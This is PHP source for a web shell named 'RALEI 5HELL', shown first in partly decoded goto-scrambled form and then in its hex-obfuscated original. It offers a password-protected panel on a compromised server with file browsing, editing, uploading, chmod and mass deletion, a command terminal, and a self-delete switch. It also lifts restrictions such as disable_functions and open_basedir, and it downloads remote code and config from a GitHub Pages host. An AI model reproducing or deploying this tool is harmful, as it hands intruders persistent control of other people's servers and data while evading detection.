        </div>\xa      </div>\xa      <div class="mb-3 d-flex">
        <input type="text" class="form-control bg-black text-success font-monospace" id="command" name="command" placeholder="" . $vartn . "">
        <button type="submit" class="btn bg-black text-light float-end ms-2">
          <span class="spinner-border spinner-border-sm d-none" role="status" aria-hidden="true"></span>
          <span class="visually-hidden">Loading...</span>
          <i class="fad fa-send"></i>
        </button>
      </div>\xa    </form>"; goto pHDy4; xFpoT: ?> 
<div class="row mb-2"><div class="col-12"><div class="border-light card"><div class="d-flex card-body"style="overflow:auto"><span class="text-warning flex-grow-1 mb-0 text-decoration-none"><i class="fa-duotone fa-folder-open"style="--fa-secondary-opacity:0.7"></i><?php  goto S9YqN; W6n8o: ?> 
<!doctypehtml><html data-bs-theme="dark"lang="id"><head><meta charset="utf-8"><meta content="width=device-width,initial-scale=1"name="viewport"><meta content="noindex, nofollow"name="robots"><meta content="no-cache, must-revalidate, post-check=0, pre-check=0"http-equiv="cache-control"><meta content="0"http-equiv="expires"><meta content="no-cache"http-equiv="pragma"><title><?php  goto Od1fM; ZHQre: function twomenu($g) { $d = $_SERVER["DOCUMENT_ROOT"]; $c = count(explode("/", $d)) - 1; $p = trim(dirname(str_replace("?getfile=", '', $g)), "/"); $f = basename($g); $r = array_slice(explode("/", $p), $c); $u = $_SERVER["HTTP_HOST"] . "/" . implode("/", $r) . "/" . $f; $h = "<div class="btn-group" style="letter-spacing: 3px;"><button type="button" class="btn btn-dark" data-bs-toggle="dropdown" aria-expanded="false"><i class="fad fa-gear"></i></button><ul class="dropdown-menu">"; $h .= "<li><a style="font-size: 13px;" class="dropdown-item text-light" href="" . $g . ""><i class="fad fa-pen-to-square"></i> EDIT</a></li>"; $h .= "<li><a style="font-size: 13px;" class="dropdown-item text-light" href="https://" . trim($u) . "" target="_blank"><i class="fad fa-globe"></i> VIEW</a></li>"; $h .= "</ul></div>"; return $h; } goto wBzEb; SexdO: ini_restore("open_basedir"); goto RJWH8; AkcPy: echo phpversion(); goto GVhMk; tWlkv: ?> 
</span></div><div class="col-12"><span class="fw-bold text-light"><i class="bi bi-person"></i> User (ID) / Group:</span><?php  goto Zxvrr; wFaVC: if (isset($_GET["loginlei"])) { $submitted_pass = isset($_GET["pwdlei"]) ? $_GET["pwdlei"] : ''; if (md5($submitted_pass) == $auth_pass) { $_SESSION["masuk"] = $auth_pass; } else { echo "<script>alert('Paswd Salah! Km Mw Nikung Yh? :v');</script>"; login_ralei(); } } goto SlGUD; NLzar: ?> 
<?php  goto qdLwq; kocnX: echo !empty($disabledFunc) ? "danger" : "success"; goto KmulI; gDQyA: if (isset($_GET["ex"]) && $_GET["ex"] == "adminer") { function gadminer($cek) { $lei = leijson()["lei"]; $php_url = $lei[0]; $css_url = $lei[1]; $php = $cek ? file_get_contents($php_url) : curl_req($php_url); $css = $cek ? file_get_contents($css_url) : curl_req($css_url); $a = "adminer.php"; $b = "adminer.css"; if (!file_exists($a) || filesize($a) == 0) { if (file_exists($a)) { unlink($a); unlink($b); } if (!file_put_contents($b, $css) || !file_put_contents($a, $php)) { die("Failed to create adminer"); } } include $a; } gadminer($cekfopenon); } goto ZHQre; OvkMa: $modalCfile = "<form method="post">" . "<div class="mb-4">" . "<label for="filename-input" class="form-label">File Name</label>" . "<input type="text" class="form-control" name="file_name" id="filename-input" required placeholder="Enter file name">" . "</div>" . "<div class="hstack gap-2 justify-content-end">" . "<button type="button" class="btn btn-outline-danger" data-bs-dismiss="modal">Close</button>" . "<button type="submit" class="btn btn-primary" name="create_file" id="addNewFile">Create</button>" . "</div>" . "</form>"; goto C0BHX; M2vPM: if (isset($getfile)) { if (file_exists($getfile)) { function to_dir() { global $getdir; $url = $_SERVER["REQUEST_URI"]; $to = preg_replace("/(\?|&)getfile=/", "$1getdir=", $url); $go = dirname($to); echo "<script> setTimeout(function() {window.location = '{$go}'; }, 1000);</script>"; } function read_file($filename) { $lines = file($filename); return implode('', $lines); } if ($cekfopenon) { $file_contents = is_file($getfile) ? file_get_contents($getfile) : ''; } else { $file_contents = is_file($getfile) ? read_file($getfile) : ''; } echo "\xa    <div class="row mb-2">\xa    <div class="col-6">
    <div class="card border border-light">\xa    <div class="card-body">\xa    <form method="post">
    <div class="form-group">
        <label class="text-light">Name:</label>\xa        <input type="text" class="form-control" id="namafile" name="new_name" value="" . basename($getfile) . "">\xa    </div>\xa    <div class="py-2">
    <input type="submit" class="btn btn-sm btn-outline-light" style="width:100%;"  name="rename" value="Rename">
    </div>
    </form>
    </div>
    </div>
    </div>\xa    "; echo "<div class="col-6">
  <div class="card border border-light">\xa  <div class="card-body">
  <form method="post">
  <div class="form-group">
    <label class="text-light">Permission</label>\xa    <input type="text" class="form-control" name="permission" value="" . @substr(sprintf("%o", fileperms($getfile)), -4) . "">
  </div>
  <div class="py-2">
  <input type="submit" class="btn btn-sm btn-outline-light" style="width:100%;" name="change_permission" value="Change">
  </div>
  </form>
  </div>
  </div>
  </div>
 </div>
 "; echo "
    <div class="row mb-2">
    <div class="col-12">
    <div class="card border border-light">\xa    <div class="card-body">    \xa    <form method="post">\xa    <div class="mb-3">
    <p class="text-light text-truncate text-center mb-3"># " . basename($getfile) . "</p>\xa    <textarea class="form-control" id="textarea" name="isifile" rows="10">" . htmlentities($file_contents) . "</textarea>       
    </div>
    <div class="d-flex d-grid gap-2 justify-content-center">\xa    <input type="submit" class="btn btn-outline-light" name="save_file" value="Update">\xa    <input type="button" class="btn btn-outline-light" onclick="savefrom('textarea')" value="Download">    \xa    </div>\xa    </form>
    </div>\xa    </div>\xa    </div>\xa    </div>
    "; } else { displayAlert("{$getfile} : Not a valid file path!", "danger"); } } goto pdgfd; mwAc1: echo !empty($disabledFunc) ? implode(", ", $disabledFunc) : "None"; goto VRGnu; kBm3K: echo "{$_SERVER["SERVER_ADDR"]}"; goto R8Gse; qanfw: ini_restore("disable_functions"); goto xN1dV; eD2Ck: ?> 
</span></div><div class="col-6"><span class="fw-bold text-light"><i class="bi bi-cursor"></i> Curl:</span><?php  goto KNMNH; zzU8_: echo function_exists("mysql_version") ? "<span class="text-success">ON</span>" : "<span class="text-danger">OFF</span>"; goto eo9oy; qwjLI: echo php_uname(); goto tWlkv; C2o3f: if (isset($_GET["ex"]) && $_GET["ex"] == "kill_me") { unlink(__FILE__); die("OK"); } goto eZ1vu; Mrb2A: if (isset($_GET["ex"]) && $_GET["ex"] == "lokfil") { if (isset($_POST["lokfil"])) { } echo modalpost("L\303\xb8ck File", "Input File Name", $modalClock, "fa-lock", '', true); echo "<script>
    window.onload = function() {
      var getModalok = document.querySelector("[data-bs-target='#l\303\270ckfile']");\xa      getModalok.addEventListener("click", function(event) {
        event.preventDefault();\xa      });\xa      getModalok.click();\xa    }\xa  </script>"; } goto M2vPM; LfI7x: $getdir = isset($_GET["getdir"]) && !empty($_GET["getdir"]) ? IS_WIN ? str_replace("\", "/", $_GET["getdir"]) : $_GET["getdir"] : (isset($_GET["getfile"]) ? dirname($_GET["getfile"]) : getcwd()); goto Fxsb6; Gwr5s: session_start(); goto Y7joY; Zbqxa: $modalUpload = "<form action="?getdir=" . $getdir . "&ex=upload" method="post" enctype="multipart/form-data">" . "<div class="mb-4">" . "<label for="file-input" class="form-label">Select File</label>" . "<input type="file" class="form-control" name="upfile" id="file-input" required>" . "</div>" . "<div class="hstack gap-2 justify-content-end">" . "<button type="button" class="btn btn-outline-danger" data-bs-dismiss="modal">Close</button>" . "<button type="submit" class="btn btn-primary" name="submit_file" id="uploadFile">Upload</button>" . "</div>" . "</form>"; goto OvkMa; DPQLU: ?> 
</div><div class="col-12"><span class="fw-bold text-light"><i class="bi bi-hdd-stack"></i> Your IP:</span> <span class="text-success"><?php  goto TNQio; VKQfC: @mb_internal_encoding("UTF-8"); goto j84KU; AZ5Qx: if (isset($_GET["ex"]) && $_GET["ex"] == "terminal") { echo modalpost("Command 5hell", "Input Command", $modalCmd, "fa-rectangle-terminal", '', true, true); echo "<script>
    window.onload = function() {\xa      var getModalCmd = document.querySelector("[data-bs-target='#command5hell']");
      getModalCmd.addEventListener("click", function(event) {\xa        event.preventDefault();\xa      });
      getModalCmd.click();\xa    }
  </script>"; } goto pZLfW; Zxvrr: echo getUserGroupInfo(); goto DPQLU; VRGnu: ?> 
</span></div></div><div class="row"><div class="col-12 d-flex justify-content-between"><a class="btn btn-outline-light me-2 ms-2"data-bs-placement="top"data-bs-title="Kerang"data-bs-toggle2="tooltip"href="?getdir=<?php  goto fgSyv; q9Zuh: if (isset($_POST["massact"])) { if (isset($_POST["cekbox"])) { $maction = $_POST["maction"]; $cekbox = $_POST["cekbox"]; foreach ($cekbox as $cek) { if ($maction == "hapus") { if (is_dir($cek)) { if (rrmdir($cek)) { displayAlert("Success Deleted Dir: <b>" . basename($cek) . "</b>", "success"); } else { displayAlert("Failed To Deleted Dir: <b>" . basename($cek) . "</b>", "danger"); } } else { if (unlink($cek)) { displayAlert("Success Deleted File: <b>" . basename($cek) . "</b>", "success"); } else { displayAlert("Failed To Deleted File: <b>" . basename($cek) . "</b>", "danger"); } } } elseif ($maction == "cemode") { $chmod = intval($_POST["cemod"], 8); if (is_dir($cek)) { if (chmod($cek, $chmod)) { displayAlert("Success changed mode for directory: <b>" . basename($cek) . "</b>", "success"); } else { displayAlert("Failed to change mode for directory: <b>" . basename($cek) . "</b>", "danger"); } } elseif (is_file($cek)) { if (chmod($cek, $chmod)) { displayAlert("Success changed mode for file: <b>" . basename($cek) . "</b>", "success"); } else { displayAlert("Failed to change mode for file: <b>" . basename($cek) . "</b>", "danger"); } } } } } } goto wB8Oc; tTGul: error_reporting(0); goto VKQfC; R8Gse: ?> 
</span></div><div class="col-6"><span class="fw-bold text-light"><i class="bi bi-database"></i> Mysql:</span><?php  goto zzU8_; mubNe: function termnotasi() { if (IS_WIN) { $u = getenv("USERNAME"); $h = getenv("COMPUTERNAME"); } else { $u = posix_getpwuid(posix_geteuid())["name"]; $h = gethostname(); } return "{$u}@{$h}: ~ $ "; } goto GljT3; KmulI: ?> 
"><?php  goto mwAc1; cmASg: ?> 
</title><link href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css"rel="stylesheet"crossorigin="anonymous"integrity="sha384-GLhlTQ8iRABdZLl6O3oVMWSktQOp6b7In1Zl3/Jr59b6EGGoI1aFkw7cmDA6j6gD"><link href="https://cdn.jsdelivr.net/npm/[email protected]/font/bootstrap-icons.css"rel="stylesheet"><link href="https://fonts.googleapis.com/css2?family=Exo+2:wght@600&display=swap"rel="stylesheet"><link href="https://rhmansh.github.io/RALEI-SHELL/assets/css/main.css"rel="stylesheet"><link href="https://rhmansh.github.io/RALEI-SHELL/assets/css/icon.css"rel="stylesheet"><script src="https://unpkg.com/@popperjs/core@2"></script><script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js"crossorigin="anonymous"integrity="sha384-w76AqPfDkMBDXo30jS1Sgez6pr3x5MlQ1ZAGC+nuZB+EYdgRZgiwxhTBTkF7CXvN"></script><script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.js"></script><script src="https://rhmansh.github.io/RALEI-SHELL/assets/js/app.js"></script></head><body><div class="preloader"><div class="loder"></div></div><style></style><div class="container-fluid zoom-in"><div class="row py-4"><div class="col-12 d-flex justify-content-center"><h1 class="fw-bold"><div class="judul mb-3"></div><div class="text-center fs-6 itsme"></div></h1></div></div><div class="row mb-2"><div class="col-12"><div class="border-light card border"><div class="card-body"><div class="text-center card-title text-warning">[!] This is Beta Version [!]</div><div class="row mb-2"><div class="col-12"><span class="fw-bold text-light"><i class="bi bi-terminal"></i> Un4me:</span> <span class="text-success"><?php  goto qwjLI; TNQio: echo "{$_SERVER["REMOTE_ADDR"]}"; goto i0xkR; eZ1vu: function login_ralei() { echo leijson()["login1"]; die; } goto wFaVC; j4A33: function isWritable($path) { if (is_dir($path)) { return is_writable($path); } else { return is_writable(dirname($path)); } } goto Nqyb1; wB8Oc: if (isset($_POST["rename"])) { $new_name = $_POST["new_name"]; $renamed = rename($getfile, dirname($getfile) . "/" . $new_name); if ($renamed) { displayAlert("File/Directory has been renamed, yasss!", "success"); } else { displayAlert("Failed to renamed File/Directory!", "danger"); } } goto lEKGy; c11Ug: echo "{$_SERVER["SERVER_NAME"]}"; goto eD2Ck; JIcP4: echo "</div>\xa   <!-- end container -->\xa<div class="container-fluid">\xa  <footer class="text-light py-3">\xa    <div class="row">\xa      <div class="col-12">\xa        <p class="myteam text-decoration-underline text-center"></p>
      </div>
    </div>
</footer>
    </div>\xa<script src="https://rhmansh.github.io/RALEI-SHELL/assets/js/main.js"></script>    
</body>
</html>"; goto utTWY; MSit5: if (isset($_GET["ex"]) && $_GET["ex"] == "retmi") { echo leijson()["readme"]; } goto xFpoT; YUX2m: function rrmdir($dir) { if (!is_dir($dir)) { throw new Exception("{$dir} is not a directory."); } $objects = scandir($dir); if ($objects === false) { throw new Exception("Failed to read directory {$dir}."); } foreach ($objects as $object) { if ($object != "." && $object != "..") { $path = $dir . "/" . $object; if (is_dir($path)) { if (!rrmdir($path)) { return false; } } else { if (!unlink($path)) { return false; } } } } if (!reset($objects)) { return false; } if (!rmdir($dir)) { return false; } clearstatcache(true, $dir); if (is_dir($dir)) { return false; } return true; } goto mubNe; SlGUD: if (!isset($_SESSION["masuk"]) || $_SESSION["masuk"] != $auth_pass) { login_ralei(); } goto W6n8o; iadoK: echo function_exists("perl") ? "<span class="text-success">ON</span>" : "<span class="text-danger">OFF</span>"; goto IBFMi; fg2Cp: echo isWritable(isset($getfile) ? $getfile : $getdir) ? span("[ Writable ] - ", "success") . "<span class="text-success">" . cekPerm(isset($getfile) ? $getfile : $getdir) . "</span>" : span("[ Not Writable ] - ", "danger") . "<span class="text-danger">" . cekPerm(isset($getfile) ? $getfile : $getdir) . "</span>"; goto LfSDA; S9YqN: echo isset($getfile) ? get_tree_path($getfile) : get_tree_path($getdir); goto V8syj; flT2x: echo "?getdir=" . $getdir . "&ex=search"; goto SOZKH; lh6vq: echo IS_WIN ? "<span class="text-success">Windows</span>" : "<span class="text-success">Unix</span>"; goto yMi02; qdLwq: echo @$_SERVER["SERVER_ADDR"]; goto cmASg; jYFEI: echo extension_loaded("php_ruby") ? "<span class="text-success">ON</span>" : "<span class="text-danger">OFF</span>"; goto lu_RQ; JGZ79: if (isset($_POST["save_file"])) { $isifile = $_POST["isifile"]; $file_path = $getfile; function svwrite($fn, $c) { $f = fopen($fn, "w"); if ($f) { fwrite($f, $c); fclose($f); return true; } else { return false; } } function svfpc($fn, $c) { if (file_put_contents($fn, $c) !== false) { return true; } else { return false; } } if (svwrite($file_path, $isifile)) { displayAlert("Update File OK!", "success"); } else { $errsv = error_get_last(); if ($errsv !== null) { $errorMessage = $errsv["message"]; displayAlert("Update File FAILED! Error: {$errorMessage}", "danger"); } else { if (svfpc($file_path, $isifile)) { displayAlert("Update File OK!", "success"); } else { displayAlert("Update File FAILED!", "danger"); } } } } goto MSit5; KdUFm: ?> 
<span class="text-<?php  goto kocnX; EOEix: ?> 
</span></div><div class="col-6"><span class="fw-bold text-light"><i class="bi bi-filetype-php"></i> PHP version:</span> <span class="text-success"><?php  goto AkcPy; Od1fM: echo "&#9730; { RALEI 5HELL }"; goto NLzar; eo9oy: ?> 
</div></div><div class="row mb-2"><div class="col-6"><span class="fw-bold text-light"><i class="bi bi-cloud"></i> Web Server:</span> <span class="text-success"><?php  goto EGi9S; GVhMk: ?> 
</span></div></div><div class="row mb-2"><div class="col-6"><span class="fw-bold text-light"><i class="bi bi-globe"></i> Domain:</span> <span class="text-success"><?php  goto c11Ug; H6Tp2: $auth_pass = "93f47598a626a203ce65b0e587d889a0"; goto Hs_m8; PpmRX: if (isset($_GET["ex"]) && $_GET["ex"] == "search") { function sercing($dir, $searchQuery) { $res = ''; $files = scandir($dir); foreach ($files as $file) { if ($file === "." || $file === "..") { continue; } $path = $dir . "/" . $file; if (is_dir($path)) { $res .= sercing($path, $searchQuery); } else { if (strpos($file, $searchQuery) !== false) { $res .= $path . "\n"; } } } return $res; } echo modalpost("Search File / Dir", "Search...", $modalCsearch, "fa-search", '', true, true); echo "<script>\xa         window.onload = function() {\xa  var getModalSer = document.querySelector("[data-bs-target='#searchfile/dir']");\xa  getModalSer.addEventListener("click", function(event) {
    event.preventDefault();\xa  });
  getModalSer.click();
} 
</script>"; if (isset($_POST["sercing"])) { $serquery = $_POST["sercing"]; $seroutput = sercing(dirname($_SERVER["DOCUMENT_ROOT"]), $serquery); echo "<script>document.getElementById("seroutput").value = " . json_encode($seroutput) . ";</script>"; } } goto AZ5Qx; C0BHX: $modalCfolder = "<form method="post">" . "<div class="mb-4">" . "<label for="foldername-input" class="form-label">Folder Name</label>" . "<input type="text" class="form-control" name="folder_name" id="foldername-input" required placeholder="Enter folder name">" . "</div>" . "<div class="hstack gap-2 justify-content-end">" . "<button type="button" class="btn btn-outline-danger" data-bs-dismiss="modal">Close</button>" . "<button type="submit" class="btn btn-primary" name="create_folder" id="addNewFolder" data-bs-toggle="tooltip" data-bs-placement="top" data-bs-title="Create Folder">Create</button>" . "</div>" . "</form>"; goto bPZB4; utTWY: ?> 

Did this file decode correctly?
Original Code
<?php
// pliz mas jgn nge recode wkwk
// copyright rahmanralei 2023
@clearstatcache();
@mb_internal_encoding('UTF-8');
@set_time_limit(0);
error_reporting(0);
 goto Gwr5s; bPZB4: $modalClock = "\x3c\146\157\x72\x6d\x20\155\x65\x74\x68\157\x64\x3d\42\x70\157\x73\164\x22\76" . "\x3c\x64\x69\166\40\x63\x6c\x61\163\x73\x3d\x22\155\142\55\64\42\76" . "\74\x6c\x61\142\145\x6c\x20\x66\x6f\x72\75\x22\146\151\154\x65\x6e\141\x6d\x65\55\151\156\160\165\x74\x22\x20\x63\x6c\141\163\163\x3d\x22\146\x6f\162\x6d\x2d\x6c\141\142\x65\x6c\42\76\106\151\x6c\145\x20\x4e\x61\155\x65\74\57\x6c\141\x62\145\x6c\76" . "\x3c\x69\156\160\x75\164\40\164\x79\x70\x65\75\42\x74\x65\170\164\x22\40\x63\154\x61\x73\x73\75\x22\146\157\162\155\x2d\143\157\156\x74\x72\157\154\x22\x20\156\x61\155\145\75\42\146\151\154\x6f\153\42\40\151\144\75\42\146\151\x6c\x65\156\141\x6d\x65\x2d\151\156\160\165\164\42\40\x72\x65\161\x75\x69\x72\x65\x64\x20\160\x6c\141\x63\145\150\157\x6c\144\145\x72\x3d\x22\x45\x6e\164\145\162\40\146\x69\154\x65\x20\156\141\x6d\x65\x20\164\157\x20\x6c\303\xb8\x63\x6b\145\144\42\x3e" . "\x3c\57\x64\x69\x76\x3e" . "\x3c\x64\151\x76\40\143\154\141\163\163\75\42\150\163\164\141\x63\x6b\40\x67\x61\160\x2d\62\x20\152\165\x73\x74\x69\x66\171\55\x63\x6f\156\164\x65\156\164\55\x65\156\x64\42\76" . "\x3c\142\165\164\x74\x6f\156\x20\164\171\x70\x65\75\x22\x62\x75\164\164\x6f\156\x22\40\143\154\x61\163\x73\75\42\x62\x74\156\40\142\164\x6e\55\157\165\164\154\151\156\145\55\x64\x61\156\147\x65\162\42\40\x64\141\164\x61\x2d\x62\163\x2d\x64\x69\163\x6d\151\x73\163\75\x22\155\157\x64\x61\x6c\42\x3e\x43\154\x6f\163\145\74\x2f\x62\165\164\x74\157\156\x3e" . "\x3c\x62\165\x74\164\x6f\156\40\164\171\x70\145\75\x22\163\x75\x62\155\x69\164\x22\40\143\x6c\141\163\x73\x3d\42\142\x74\156\x20\x62\x74\156\55\x70\x72\x69\x6d\x61\x72\x79\42\40\156\141\x6d\145\x3d\42\154\x6f\153\146\151\x6c\x22\x20\x69\x64\x3d\42\141\x64\x64\116\145\167\106\x69\x6c\x65\42\x3e\114\x6f\143\153\40\116\x6f\x77\x3c\57\x62\x75\164\x74\157\156\76" . "\x3c\57\144\151\166\x3e" . "\74\x2f\x66\157\x72\x6d\76"; goto bXXTk; V8syj: ?>
- <span><?php  goto fg2Cp; MKNta: function curl_req($u) { $c = curl_init(); curl_setopt($c, CURLOPT_URL, $u); curl_setopt($c, CURLOPT_RETURNTRANSFER, true); $o = curl_exec($c); curl_close($c); return $o; } goto S97wg; xN1dV: ini_restore("\141\x6c\154\x6f\167\137\x75\x72\154\x5f\x66\x6f\160\145\x6e"); goto RJZ6S; GljT3: function modalpost($title, $label, $form, $icon = '', $text = '', $hidden = false, $size = false) { $titles = str_replace("\x20", '', strtolower($title)); $labels = str_replace("\x20", '', strtolower($label)); $hidden_attr = $hidden ? "\x64\x2d\156\x6f\156\x65" : ''; $size = $size ? "\x6d\x6f\x64\141\154\55\x66\x75\154\x6c\163\x63\x72\145\145\x6e\55\154\147\55\144\x6f\167\156" : ''; return "\74\144\x69\x76\40\143\x6c\x61\163\163\75\x22\x6d\157\x64\x61\154\x20\146\141\x64\x65\x20\172\x6f\x6f\x6d\111\x6e\42\x20\x69\144\x3d\x22" . $titles . "\x22\x20\x74\141\x62\151\156\144\145\170\x3d\x22\55\x31\x22\40\x61\162\151\141\55\154\x61\142\x65\x6c\154\145\x64\142\x79\75\42" . $titles . "\137\x4c\141\x62\145\x6c\x22\x20\x61\162\151\141\55\150\x69\x64\144\x65\x6e\75\42\x74\162\x75\145\x22\x3e" . "\74\144\x69\x76\x20\x63\154\141\x73\x73\75\42\x6d\157\144\141\x6c\55\x64\x69\141\154\x6f\x67\40\155\157\x64\x61\x6c\x2d\x64\151\141\x6c\x6f\x67\x2d\x63\x65\156\164\145\162\x65\x64\x20" . $size . "\42\76" . "\x3c\144\x69\x76\x20\x63\154\x61\163\163\75\x22\x6d\x6f\144\141\x6c\55\x63\157\x6e\164\145\x6e\164\42\x3e" . "\74\144\x69\x76\x20\x63\154\141\163\163\75\x22\x6d\157\144\x61\154\55\150\145\141\144\x65\162\40\160\x2d\x33\x20\x62\x67\x2d\x73\x6f\x66\x74\x2d\x70\x72\151\x6d\x61\162\171\42\76" . "\74\x68\65\x20\143\x6c\x61\163\x73\x3d\42\155\x6f\144\141\x6c\x2d\x74\x69\164\154\145\x22\x20\x69\x64\x3d\42" . $titles . "\137\114\141\142\145\154\42\76" . $title . "\46\156\x62\163\x70\x3b\40\74\x69\x20\x63\154\141\163\163\x3d\42\x66\141\x64\40" . $icon . "\42\x3e\x3c\x2f\151\76\x3c\x2f\150\65\76" . "\74\142\x75\164\164\157\x6e\x20\164\x79\x70\x65\75\42\142\165\164\164\157\x6e\42\x20\143\154\x61\163\x73\x3d\42\142\164\x6e\55\x63\154\157\x73\145\42\40\144\x61\x74\141\x2d\142\163\x2d\144\x69\163\155\x69\163\163\x3d\x22\x6d\x6f\x64\x61\x6c\x22\40\141\x72\151\141\55\x6c\141\x62\145\x6c\x3d\42\x43\x6c\157\x73\145\42\x3e\74\x2f\142\x75\x74\x74\157\x6e\76" . "\74\x2f\144\x69\166\76" . "\x3c\x64\151\x76\x20\143\x6c\x61\163\163\75\x22\x6d\x6f\x64\141\154\55\142\157\144\171\x22\76" . $form . "\x3c\57\144\x69\x76\x3e" . "\x3c\57\144\151\166\76" . "\x3c\57\144\x69\166\76" . "\x3c\57\144\151\x76\x3e" . "\x3c\x62\x75\x74\x74\157\x6e\x20\143\x6c\x61\163\163\75\42\x62\x74\x6e\x20\142\x74\x6e\55\x6f\165\x74\154\x69\x6e\x65\x2d\x6c\x69\147\150\164\x20" . $hidden_attr . "\x20\155\145\x2d\62\42\40\144\141\x74\141\55\142\x73\55\x74\x6f\x67\147\154\145\x3d\x22\155\157\144\141\154\42\40\x64\141\164\x61\x2d\x62\163\55\x74\x61\162\x67\x65\x74\75\x22\43" . $titles . "\42\x20\144\x61\x74\x61\55\x62\x73\x2d\x74\157\147\147\154\x65\62\x3d\42\164\x6f\x6f\154\164\x69\x70\x22\x20\x64\x61\x74\141\55\142\x73\x2d\160\154\141\x63\x65\155\145\156\164\x3d\x22\164\157\160\42\x20\x64\141\x74\141\55\x62\x73\x2d\x74\151\x74\x6c\x65\75\x22" . $title . "\42\76\x3c\151\40\x63\x6c\141\163\x73\x3d\42\40" . $icon . "\42\76" . $text . "\x3c\x2f\151\x3e\74\x2f\142\165\x74\164\157\x6e\x3e"; } goto Zbqxa; SwLyI: function formatBytes($size, $precision = 2) { $u = array("\102", "\x4b\x42", "\x4d\102", "\x47\x42", "\124\102"); $b = max($size, 0); $pow = floor(($b ? log($b) : 0) / log(1024)); $pow = min($pow, count($u) - 1); $b /= pow(1024, $pow); return round($b, $precision) . "\40" . $u[$pow]; } goto YUX2m; KNMNH: echo function_exists("\x63\x75\162\x6c\x5f\x76\145\x72\x73\151\157\x6e") ? "\x3c\x73\x70\141\x6e\x20\143\154\x61\163\x73\75\42\164\145\170\x74\x2d\x73\165\143\x63\x65\163\163\42\x3e\117\x4e\74\x2f\163\x70\x61\x6e\x3e" : "\74\x73\160\141\156\x20\x63\x6c\x61\163\163\75\42\x74\x65\170\x74\55\x64\x61\156\x67\145\x72\42\x3e\117\x46\106\74\x2f\x73\160\141\156\x3e"; goto L3Eg1; yMi02: ?>
</div><div class="col-6"><span class="fw-bold text-light"><i class="bi bi-code-slash"></i> Perl:</span><?php  goto iadoK; LfSDA: ?>
</span></span></div></div></div></div><?php  goto PpmRX; dPqA6: echo modalpost("\x43\162\145\141\164\x65\x20\106\151\154\x65", "\106\x69\x6c\145\x20\116\x61\x6d\145", $modalCfile, "\146\x61\x64\x20\146\x61\x2d\146\x69\x6c\x65\x2d\143\x69\162\x63\154\145\55\160\154\x75\163"); goto OZW8u; bXXTk: $modalCsearch = "\x3c\146\x6f\162\155\40\155\x65\x74\x68\157\144\x3d\x22\120\117\x53\x54\x22\76\12\x20\x20\40\40\x20\40\74\x64\151\166\x20\x63\154\x61\163\163\x3d\x22\x6d\142\55\63\x22\x3e\xa\40\40\x20\40\40\40\40\40\x3c\x64\x69\x76\x20\x63\x6c\x61\163\163\x3d\42\x77\55\x31\60\60\x22\x3e\xa\40\x20\x20\x20\x20\x20\40\x20\x20\x20\x3c\164\145\x78\x74\x61\162\x65\141\40\143\154\141\x73\163\75\42\x66\x6f\x72\x6d\x2d\143\x6f\x6e\164\x72\x6f\x6c\40\x62\147\55\x62\x6c\141\x63\x6b\x20\x74\145\x78\x74\x2d\x73\x75\143\x63\x65\163\163\x22\40\151\144\75\x22\163\145\162\x6f\x75\x74\160\165\x74\42\x20\x6e\x61\x6d\x65\75\x22\x73\145\162\x6f\x75\164\x70\165\164\42\x20\162\x6f\167\163\75\42\x32\65\x22\40\x72\145\x61\144\x6f\156\154\x79\76\x3c\57\164\x65\x78\164\141\x72\x65\x61\x3e\xa\40\x20\x20\x20\40\x20\x20\40\74\57\x64\x69\166\76\12\40\x20\x20\x20\x20\40\74\x2f\x64\x69\166\x3e\xa\40\x20\40\40\x20\40\74\x64\x69\166\x20\143\154\x61\x73\163\75\42\155\142\x2d\x33\x20\144\55\x66\154\x65\170\42\x3e\xa\x20\40\x20\40\40\40\40\40\x3c\x69\x6e\x70\x75\x74\40\164\171\x70\x65\x3d\x22\x74\145\x78\164\x22\x20\x63\x6c\141\163\163\x3d\x22\x66\157\162\x6d\x2d\143\157\x6e\164\162\x6f\154\x20\x62\147\x2d\x62\154\141\143\x6b\x20\x74\x65\170\164\55\x73\165\143\143\x65\163\163\x22\40\x69\144\75\42\x73\145\162\x63\151\156\x67\x22\x20\x6e\x61\155\x65\x3d\42\163\145\x72\x63\151\x6e\x67\42\x20\160\x6c\x61\143\145\150\157\x6c\144\x65\x72\75\42\123\x65\141\162\143\x68\40\116\x61\155\x65\56\x2e\56\42\x3e\xa\40\40\40\x20\40\40\x3c\142\165\164\164\157\156\40\164\171\x70\x65\75\x22\163\x75\x62\x6d\151\164\42\x20\x63\x6c\141\x73\163\75\42\142\x74\156\x20\x62\x67\55\142\x6c\x61\x63\153\40\164\x65\x78\164\x2d\154\151\147\x68\164\40\x66\x6c\157\x61\164\x2d\145\156\x64\x20\155\163\55\x32\42\76\x3c\151\x20\143\x6c\141\163\163\75\42\x66\141\144\x20\x66\x61\55\x73\x65\141\x72\143\x68\x22\76\74\57\x69\76\74\57\x62\165\x74\164\157\x6e\76\12\74\57\144\151\166\x3e\12\40\x20\40\x20\x3c\x2f\146\157\x72\155\76"; goto jyDMo; S97wg: function get_tree_path($path) { $canonical_path = realpath($path); $path_parts = explode("\57", $canonical_path); $tree_path = ''; $current_path = ''; foreach ($path_parts as $part) { $current_path .= $part . "\57"; $tree_path .= "\x3c\141\40\143\x6c\x61\x73\x73\75\x27\164\145\x78\x74\x2d\164\162\x75\x6e\143\x61\x74\x65\40\146\x73\x74\x2d\156\x6f\162\155\141\154\40\164\x65\170\x74\55\154\151\147\150\164\40\x74\145\x78\164\x2d\144\145\143\157\x72\x61\164\x69\157\x6e\55\156\157\x6e\x65\x27\x20\150\162\145\x66\x3d\47\x3f\147\145\x74\144\x69\x72\x3d" . $current_path . "\47\76" . $part . "\74\x2f\141\x3e\40\x2f\x20"; } $tree_path = rtrim($tree_path, "\57\40"); return $tree_path; } goto Sw0vr; Sw0vr: function leijson() { $lei = "\150\164\x74\x70\x73\72\x2f\57\162\x68\x6d\x61\x6e\163\150\56\147\x69\x74\x68\165\x62\56\x69\x6f\x2f\x52\101\x4c\105\x49\55\123\110\x45\114\x4c\x2f\152\163\x6f\156\x2f\162\141\x6c\x65\151\x2e\152\163\x6f\x6e"; if (ini_get("\141\x6c\x6c\157\x77\137\x75\x72\154\x5f\x66\x6f\160\x65\156")) { $jd = file_get_contents($lei); } else { $jd = curl_req($lei); } $d = json_decode($jd, true); return $d; } goto j4A33; IBFMi: 